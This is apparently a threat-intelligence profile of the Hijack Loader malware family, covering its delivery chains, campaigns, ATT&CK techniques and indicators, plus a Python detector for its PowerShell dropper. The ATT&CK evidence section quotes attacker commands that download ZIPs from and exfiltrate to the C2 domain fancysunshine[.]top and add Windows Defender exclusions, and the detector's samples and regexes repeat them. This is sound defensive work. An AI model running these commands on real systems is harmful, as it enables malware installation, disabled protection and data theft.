
Hijack Loader

Hijack Loader is a modular Windows malware loader used as a conduit for additional payloads, including information stealers and remote access trojans. It is also known as DOILoader and IDAT Loader. It is described as a stage-1 downloader or payload enabler and has been observed reconstructing payloads in memory, decrypting embedded data, injecting shellcode into newly spawned processes, and deploying follow-on malware via process injection, including Remcos RAT into the legitimate Chime.exe process.

Observed delivery vectors include malicious PowerShell downloaders, ClickFix-style social engineering, compromised websites, SEO poisoning, malvertising, fake software installers, pirated or cracked software lures, MSI installers, ZIP archives containing LNK files, and abuse of platforms such as YouTube and Viber. In one documented chain, a PowerShell script from fancysunshine[.]top downloaded RD.zip, extracted it under %TEMP% into fake Chrome cache folders, and executed S-D.exe; the payload in RD.zip was identified as Hijack Loader. That script also added Windows Defender exclusions for C:\ and for MicrosoftEdgeUpdate.exe and SecurityHealthSystray.exe, collected the victim's external IP address and username, checked for a scheduled task named MSSecurity, exfiltrated result.txt to upload.php on fancysunshine[.]top, and cleaned up downloaded artifacts.

The malware appears across multiple criminal delivery ecosystems and campaigns. ClearFake campaigns delivered Hijack Loader to Windows systems alongside Amadey and IDAT Loader. Microsoft reported Storm-3075-related AI-themed malvertising and other campaigns distributing Hijack Loader alongside Lumma Stealer and Oyster. SEO poisoning campaigns used fake Cloudflare CAPTCHA pages and ClickFix to drop RedLine Stealer via Hijack Loader. Other observed chains used Hijack Loader to deploy Lumma Stealer, Atomic Stealer, Vidar Stealer, Rhadamanthys, RedLine Stealer, ACR Stealer, and Remcos RAT. RenEngine Loader has been reported decrypting, staging, and transferring execution to Hijack Loader to enable flexible downstream payload deployment.

Associated threat activity includes Russia-aligned UAC-0184 / Hive0156 targeting Ukrainian military and government entities via Viber-delivered ZIP archives with malicious LNK files. In that campaign, PowerShell, DLL side-loading, module stomping, in-memory payload reconstruction, scheduled-task persistence, and security-product checks were used before Hijack Loader launched Remcos RAT. GrayBravo activity also includes distribution of Hijack Loader through the CastleLoader ecosystem. The malware was also specifically named as a target of the May 2025 Operation Endgame action.

High-confidence indicators and artifacts reported for this family include fancysunshine[.]top, Add.ps1, RD.zip, S-D.exe, %TEMP%/chrome_BITS_5484_11223155, %TEMP%/chrome_BITS_5484_11123155, upload.php, result.txt, deleter.ps1, smoothieks.zip, and abuse of legitimate executables such as CFlux.exe and Chime.exe in side-loading and injection chains.


THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers.

Storm-3075

While the example campaign described in this section delivered Vidar Stealer, we have also observed this campaign distributing Lumma Stealer, Hijack Loader, and Oyster.

via microsoft.com
Greedy Sponge

Credential Theft and Remote Access Surge as AllaKore, PureRAT, and Hijack Loader Proliferate

via cloudatg.com
MITRE ATT&CK

Techniques & procedures

18 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

2 techniques

T1583 Acquire Infrastructure (evidence: 1)

Since at least early 2026, Microsoft Threat Intelligence has observed malvertising campaigns that use AI-themed terms such as “Awesome AI Windows Plugin” and “Flux Pro AI” in social engineering lures ... Microsoft attributes this malvertising activity to an initial access broker and malware distributor tracked as Storm-3075.

T1583.008 Malvertising (evidence: 1)

“creates a throwaway GitHub account and forks… edits the download link… used sponsored ads… to promote their commit… deliver Hijack Loader and Atomic Stealer.”

Initial Access

1 technique

T1189 Drive-by Compromise (evidence: 4)

Analysis of the redirection chain determined that the attack likely originated from free movie streaming sites. Infections on such sites typically begin when users interact with embedded movie players or click popups.

Execution

3 techniques

T1053.005 Scheduled Task (evidence: 1)

The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity...

T1059.001 PowerShell (evidence: 1)

During routine malware analysis, I discovered a PowerShell-based dropper script being delivered from a malicious C2 domain... This script disables security controls, fetches 2 payloads (SectopRAT, HiJack Loader), exfiltrates data, and removes all traces of its execution.

T1204 User Execution (evidence: 2)

Then S-D.exe is executed from each extracted directory.

Persistence

1 technique

T1053.005 Scheduled Task (evidence: 1)

The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity...

Privilege Escalation

1 technique

T1053.005 Scheduled Task (evidence: 1)

The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity...

Stealth

5 techniques

T1027 Obfuscated Files or Information (evidence: 1)

"distributed via a heavily obfuscated Inno Setup installer"; "Delivered via a downloader in a ZIP archive"; "illegally modified game installers distributed via piracy platforms"

T1036 Masquerading (evidence: 2)

The archives contained a heavyweight Win32 PE that masqueraded as the DeepSeek installer.

T1070.004 File Deletion (evidence: 1)

Before exiting, the malware removes:
- All downloaded ZIPs and folders
- The exfiltrated result file
- Itself, via a helper script deleter.ps1

T1497 Virtualization/Sandbox Evasion (evidence: 1)

"Hijack Loader incorporates an array of anti-virtual machine and anti-debug techniques"

T1497.001 System Checks (evidence: 1)

The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity, and writes results to a result.txt file.

Credential Access

1 technique

T1649 Steal or Forge Authentication Certificates (evidence: 1)

The malware executable was signed with a fraudulently obtained Microsoft-issued code-signing certificate obtained through Artifact Signing... Microsoft attributes the signing service used by the threat actor to Fox Tempest.

Discovery

4 techniques

T1016 System Network Configuration Discovery (evidence: 1)

The malware collects the victim’s external IP address...
$externalIP = Invoke-RestMethod -Uri "http://ifconfig.me/ip"

T1033 System Owner/User Discovery (evidence: 1)

The malware collects the victim’s external IP address and username...
$username = $env:USERNAME

T1497 Virtualization/Sandbox Evasion (evidence: 1)

"Hijack Loader incorporates an array of anti-virtual machine and anti-debug techniques"

T1497.001 System Checks (evidence: 1)

The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity, and writes results to a result.txt file.

Collection

1 technique

T1560 Archive Collected Data (evidence: 1)

The script uses Invoke-WebRequest to pull two ZIP archives from the same C2... Each ZIP is extracted to a fake Chrome cache folder inside %TEMP%.

Command and Control

1 technique

T1105 Ingress Tool Transfer (evidence: 2)

The script uses Invoke-WebRequest to pull two ZIP archives from the same C2...
Invoke-WebRequest -URI https://fancysunshine[.]top/s8dj3bh9w877/NC.zip -outfile $file
...
Invoke-WebRequest -URI https://fancysunshine[.]top/s8dj3bh9w877/RD.zip -outfile $file1

Exfiltration

1 technique

T1041 Exfiltration Over C2 Channel (evidence: 1)

Then, it exfiltrates the result via an HTTP POST to: https://fancysunshine[.]top/s8dj3bh9w877/upload.php
Payload structure: multipart/form-data, with result.txt and a folder tag report.

Other

1 technique

T1562.001 Disable or Modify Tools (evidence: 2)

The script attempts to evade detection by creating Windows Defender exclusions for the entire C drive and two known processes often abused in malware campaigns.
Add-MpPreference -ExclusionPath $folderPath
Add-MpPreference -ExclusionProcess $processName
Add-MpPreference -ExclusionProcess $processName1
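As an added example (not code from this page's sources or from the Mallory product), the following Python flags the dropper behaviours described in the profile and the ATT&CK evidence above: Defender exclusions for the root drive and for processes, the ifconfig.me lookup, the MSSecurity scheduled-task check, ZIP retrieval from fancysunshine[.]top, and fake Chrome cache folders under %TEMP%. It runs over constructed PowerShell script-block log text; the rule names, regexes, scoring threshold and sample records are assumptions.

```python
import re

# Constructed sample records modelled on PowerShell ScriptBlock logging
# (Event ID 4104). Synthetic text, not captured events.
SAMPLE_EVENTS = [
    {"id": 1, "text": 'Add-MpPreference -ExclusionPath "C:\\"'},
    {"id": 2, "text": "Add-MpPreference -ExclusionProcess MicrosoftEdgeUpdate.exe"},
    {"id": 3, "text": '$externalIP = Invoke-RestMethod -Uri "http://ifconfig.me/ip"'},
    {"id": 4, "text": 'Get-ScheduledTask -TaskName "MSSecurity"'},
    {"id": 5, "text": "Invoke-WebRequest -URI https://fancysunshine.top/s8dj3bh9w877/RD.zip -outfile $file1"},
    {"id": 6, "text": "Expand-Archive $file1 $env:TEMP\\chrome_BITS_5484_11223155"},
    {"id": 7, "text": "Get-ChildItem C:\\Users\\alice\\Documents"},  # benign control line
]

# Each rule: (name, ATT&CK id, compiled regex). The behaviours come from
# the page; the rule names and regexes are our own assumptions.
RULES = [
    ("defender_root_exclusion", "T1562.001",
     re.compile(r"Add-MpPreference\s+-ExclusionPath\s+['\"]?[A-Za-z]:\\?['\"]?\s*$", re.I)),
    ("defender_process_exclusion", "T1562.001",
     re.compile(r"Add-MpPreference\s+-ExclusionProcess\b", re.I)),
    ("external_ip_lookup", "T1016",
     re.compile(r"Invoke-RestMethod\b.*ifconfig\.me", re.I)),
    ("mssecurity_task_check", "T1053.005",
     re.compile(r"ScheduledTask\b.*MSSecurity", re.I)),
    ("zip_download_from_c2", "T1105",
     re.compile(r"Invoke-WebRequest\b.*fancysunshine\.top.*\.zip", re.I)),
    ("fake_chrome_cache_in_temp", "T1036",
     re.compile(r"TEMP.*chrome_BITS_\d+_\d+", re.I)),
]

def scan_events(events):
    """Return a list of (event id, rule name, technique id) for every rule hit."""
    hits = []
    for ev in events:
        for name, technique, rx in RULES:
            if rx.search(ev["text"]):
                hits.append((ev["id"], name, technique))
    return hits

def chain_score(hits, threshold=3):
    """True when enough distinct rules fired to suggest the whole dropper chain,
    rather than a single exclusion or download seen in isolation."""
    return len({name for _, name, _ in hits}) >= threshold

if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    print(found)
    print("dropper chain suspected:", chain_score(found))
```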

INDICATORS OF COMPROMISE

IOCs tracked for this family

8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.

Network
4 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
3 tracked

Other indicator types observed in public reporting.
